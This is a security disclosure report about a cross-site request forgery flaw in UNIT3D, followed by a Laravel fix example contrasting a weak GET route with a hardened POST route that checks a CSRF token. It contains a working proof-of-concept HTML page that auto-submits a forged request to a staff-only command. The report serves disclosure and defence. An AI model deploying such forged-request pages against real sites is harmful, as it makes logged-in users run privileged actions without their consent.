Cross-Site Request Forgery (CSRF) in hdinnovations/unit3d-community-edition
Valid
Reported on
Sep 24th 2021
Description
An attacker is able to make a logged-in staff member run staff-only commands.
Proof of Concept
While logged in, open this POC.html in a browser. The staff-only tool is run without any further interaction.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://unit3d.site/dashboard/commands/clear-cache">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Impact
This vulnerability allows an attacker to forge a request that makes a logged-in staff user unintentionally run staff-only tools.
Test
Tested on Safari.
Fix
You should require a CSRF token on such requests, or use POST instead of GET (state-changing actions should not be reachable by GET at all). Because the session cookie's SameSite attribute is Lax, a cross-origin POST request could not carry the cookie, whereas a top-level GET navigation still does.
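The following is an added example, not UNIT3D's own code: a Laravel route file showing the weak GET pattern beside the hardened POST version, with the matching Blade form in a comment. The route path comes from the report; the route closures, the `manage-staff-tools` gate name and the route name are assumptions.

```php
<?php
// routes/web.php (example added for illustration; not the project's real file)
// Assumed gate name `manage-staff-tools`; only the URL path is from the report.

use Illuminate\Http\Request;
use Illuminate\Support\Facades\Artisan;
use Illuminate\Support\Facades\Route;

// BEFORE (weak): a state-changing staff command reachable by GET.
// A top-level navigation from any origin (the auto-submitted form in the
// PoC, a link, an <img>) carries the session cookie even with
// SameSite=Lax, so the victim's own staff permission satisfies the only
// check, and no CSRF token is ever verified for a GET.
Route::middleware(['auth', 'can:manage-staff-tools'])->group(function () {
    Route::get('/dashboard/commands/clear-cache', function () {
        Artisan::call('cache:clear');
        return back();
    });
});

// AFTER (hardened): POST only. Routes in routes/web.php sit in the `web`
// middleware group, whose VerifyCsrfToken middleware rejects any POST that
// lacks a valid `_token`. With `'same_site' => 'lax'` in config/session.php
// (Laravel's default), a cross-site POST does not even carry the session
// cookie, so the request fails authentication before the CSRF check.
Route::middleware(['auth', 'can:manage-staff-tools'])->group(function () {
    Route::post('/dashboard/commands/clear-cache', function (Request $request) {
        Artisan::call('cache:clear');
        return back()->with('success', 'Cache cleared');
    })->name('staff.commands.clear-cache');
});

/*
 Matching Blade form (assumed view; the @csrf directive emits the hidden
 `_token` input that VerifyCsrfToken compares against the session):

 <form method="POST" action="{{ route('staff.commands.clear-cache') }}">
     @csrf
     <button type="submit">Clear cache</button>
 </form>

 The PoC's GET form would now receive a 405 Method Not Allowed, and a
 forged cross-site POST would be rejected with 419 (token mismatch).
*/
```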
Validated code references: web.php#L736-L745, index.blade.php#L34-L160